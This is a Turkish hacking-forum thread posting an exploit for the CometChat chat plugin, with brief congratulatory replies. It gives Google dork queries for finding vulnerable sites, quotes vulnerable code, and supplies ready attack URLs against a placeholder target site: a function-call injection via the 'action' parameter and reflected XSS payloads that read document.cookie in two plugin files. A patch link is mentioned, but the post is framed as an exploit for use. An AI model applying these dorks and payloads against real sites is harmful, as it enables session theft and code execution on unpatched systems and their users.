Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
CometChat Plugin Kritik XSS Exploit
#1
Satıcı Anasayfası =>
Kod:
http://www.cometchat.com/

Aratma Kodu =>
Kod:
inurl:''/cometchat/plugins/filetransfer/uploads/''
Kod:
inurl:''plugins/otavchat/invite.php''

Hangi Hazır Scriptlerde Kullanılabilir ve Açık Ortaya Çıkabilir =>

MyBB, VBulletin, SMF, Joomla, WordPress, phpFOX, Elgg

Açığı Kapatma Yolu Güncelleştirme =>
Kod:
http://www.cometchat.com/blog/cometchat-critical-security-update/

4.6 Versiyonunu yükleyerek en son sürümü yükleyebilirsiniz.

Kod:
http://www.cometchat.com/blog/cometchat-critical-security-update/

1) Kodun Düzenlenmesi ve Hata Olan Kısım => (plugins/otavchat/invite.php)

Kod:
194: call_user_func call_user_func($_GET['action']);

Örnek => HEDEFSITE/cometchat/plugins/otavchat/invite.php?action=phpinfo

2.)XSS P0C => (plugins/otavchat/invite.php)
Kod:
137: echo echo <<<EOD  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html>  <head>  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>   <title>{$otavchat_language[18]}</title>   <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/otavchat{$rtl}.css" />   </head>  <body>  <form method="post" action="invite.php?action=inviteusers">  <div class="container2">  <div style="background-color:#3E92BD;border-bottom:1px solid #11648F;">   <div class="invitetitle">{$otavchat_language[16]}</div><div style="float:right"><input type=submit value="{$otavchat_language[17]}" class="invitebutton"></div>   <div style="clear:both"></div>  </div>    <div style="height:162px;overflow-x:hidden;overflow-y:scroll;clear:both;padding-left:5px;padding-top:5px;padding-bottom:5px;">{$s['available']}{$s['away']}{$s['offline']}</div>  </div>    <input type="hidden" name="roomid" value="$id">  </form>  </body>  </html>  EOD;
87: $id = $_GET['roomid'];

Örnek =>

Kod:
HEDEFSITE/cometchat/plugins/otavchat/invite.php?roomid="><script>alert(document.cookie)</script>

3) XSS Kodlarının Hata Oluşan Yer => (plugins/filetransfer/index.php)

Kod:
87: echo echo <<<EOD  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html>  <head>  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>  <title>{$filetransfer_language[0]}</title>   <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/filetransfer{$rtl}.css" />   <script type="text/javascript" src="styleinput.js"></script>  </head>    <body><form name="upload" action="upload.php" method="post" enctype="multipart/form-data">  <div class="container">  <div class="container_title">{$filetransfer_language[1]}</div>    <div class="container_body">    <div class="container_body_1">{$filetransfer_language[2]}</div>  <div id="select-0" class="container_body_2"><label class="cabinet"><input type="file" class="file" name="Filedata" onchange="javascript:document.upload.submit()"/></label></div>    <div class="container_body_3">{$filetransfer_language[4]}</div>  <div style="clear:both"></div>      <div class="container_body_4">{$filetransfer_language[3]}</div>    <input type="hidden" name="to" value="{$toId}">  <input type="hidden" name="chatroommode" value="{$chatroommode}">    </div>  </div>  </div>    <script>  SI.Files.stylizeAll();  </script>  </form>  </body>  </html>  EOD;
79: $toId = $_GET['id'];

Örnek =>

HEDEFSITE/cometchat/plugins/filetransfer/index.php?id="><script>alert(document.cookie)</script>
Hide Post
Beğenenler:
#2
eline sağlık exciting
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#3
Demek illegalizm in acigida buydu baktim ama bulamadim xss acigin aklima gelmedin exciting exciting
Ellerine saglik abi
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 13 264 09-12-2016, Saat: 09:56
Son Yorum: anubis
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 117 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
  WP Reflex Gallery Plugin Shell Yükleme Açığı KingSkrupellos 6 99 23-11-2016, Saat: 16:41
Son Yorum: ferdimeric
  Perl ve Python Exploit Bilgisi Anlatım Part 1 Takisik 2 228 23-11-2016, Saat: 08:38
Son Yorum: KingSkrupellos
  Linux x86_64 Privilege Escalation Local Root Exploit KingSkrupellos 1 76 08-11-2016, Saat: 16:09
Son Yorum: RedLife
Anahtar Kelimeler

CometChat Plugin Kritik XSS Exploit indir, CometChat Plugin Kritik XSS Exploit Videosu, CometChat Plugin Kritik XSS Exploit Online izle, CometChat Plugin Kritik XSS Exploit Bedava indir, CometChat Plugin Kritik XSS Exploit Yükle, CometChat Plugin Kritik XSS Exploit Hakkında, CometChat Plugin Kritik XSS Exploit Nedir, CometChat Plugin Kritik XSS Exploit Free indir, CometChat Plugin Kritik XSS Exploit Oyunu, CometChat Plugin Kritik XSS Exploit Download


1 Ziyaretçi